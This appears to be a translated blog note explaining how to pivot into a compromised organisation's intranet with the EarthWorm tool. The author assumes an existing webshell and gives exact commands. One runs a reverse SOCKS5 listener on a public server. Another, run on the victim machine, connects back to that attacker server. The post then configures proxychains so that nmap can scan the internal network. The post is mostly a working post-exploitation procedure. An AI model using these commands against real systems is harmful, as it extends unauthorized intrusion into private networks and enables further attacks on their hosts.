0x00 Preface
Recently, there is a need for intranet penetration when setting up a station. The big guy recommended EW to me. This article simulated an attack scenario to make a brief introduction to the use of earthworm. In fact, the corresponding content of the official website of EW has been described in great detail. I am here to make a simple record from the following aspects purely as a personal note:
1. How to use EW as reverse Socks5 proxy
2. How to set the Socks5 proxy to access the target intranet Web Service
3. Using proxychains to set Socks5 proxy for terminal (it is convenient to proxy the traffic of local command line tool into the target intranet)
0x01 basic environment and network topology
Kali Linux (attacker intranet 192.168.40.135)
Ubuntu 16.04.3 (attacker http://120.xxxx.xxx.xxx)
Windows Server 2008 (Visim target intranet http://10.xxxx.xxx.xxx)
Network topology: Kali Linux is a local virtual machine, Ubuntu is an ECS on the public network, Windows Server 2008 is the target machine, internal IP, and some ports are mapped to the external network.
There should be a topology map here. I'll learn about Visio later, and add 23333
0x02 scene simulation
Now we have obtained the permission of a machine in the target intranet (the machine maps port 80 to the Internet, the web service has a vulnerability, and we have obtained webshell). I need to further penetrate the intranet. At present, I have a public Ubuntu and an intranet Kali. How can I reverse Socks5 to proxy Kali's traffic into the target intranet?
0x03 use EW as reverse Socks5 proxy
Here I only demonstrate how to use EW as the reverse Socks5 proxy. For the forward and multi-level cascade proxy, please refer to the official documents.
Step 1: execute the following command on Ubuntu on the public network:
./ew_for_linux64 -s rcsocks -l 1080 -e 1024 &
This command means that the public network machine listens for ports 1080 and 1024. Wait for the attacker machine to access port 1080 and the target machine to access port 1024.
Step 2: the target machine executes the following command:
ew_for_Win.exe -s rssocks -d 120.xxx.xxx.xx -e 1024
Where the value of - D parameter is just the public IP address
Step 3: attacker machine accesses the target intranet service through proxychains or browser setting Socks5 agent
0x04 browser set Socks5 proxy
Click OK after setting. At this time, you can access the web service of the target intranet through the browser.
0x05 use proxychains to set Socks5 agent for terminal
Step 1: Download and install proxychains
cd /usr/local/src
git clone https://github.com/rofl0r/proxychains-ng.git
cd proxychains-ng
./configure --prefix=/usr --sysconfdir=/etc
make && make install
make install-config
cd .. && rm -rf proxychains-ng
Step 2: edit proxychains configuration file to set agent
vi /etc/proxychains.conf
socks5 120.xx.xx.xx 1080
Step 3: for example: scan the target intranet with proxychains nmap
After setting, you can use the way similar to proxychains nmap 192.168.40.133 to proxy the traffic of nmap to the target intranet for scanning. Other command-line tools are the same.
0x06 postscript
In the process of using, there are also some problems, some tools do not use the sock5 agent, it is very embarrassing, the specific reason is unknown. I'm a little sleepy. I'll go home and sleep. I'll solve the rest tomorrow. The body is the capital of revolution.
I hope that the students interested in this aspect can get something from this article by chance. Of course, if there are any mistakes, please do not hesitate to comment.
0x07 reference link
Post penetration for a large domestic plant - continuous
Using proxychains to use Socks5 proxy CSDN blog in terminal
https://jingyan.baidu.com/album/b87fe19e9c0f9d5218356829.html?picindex=2
EarthWorm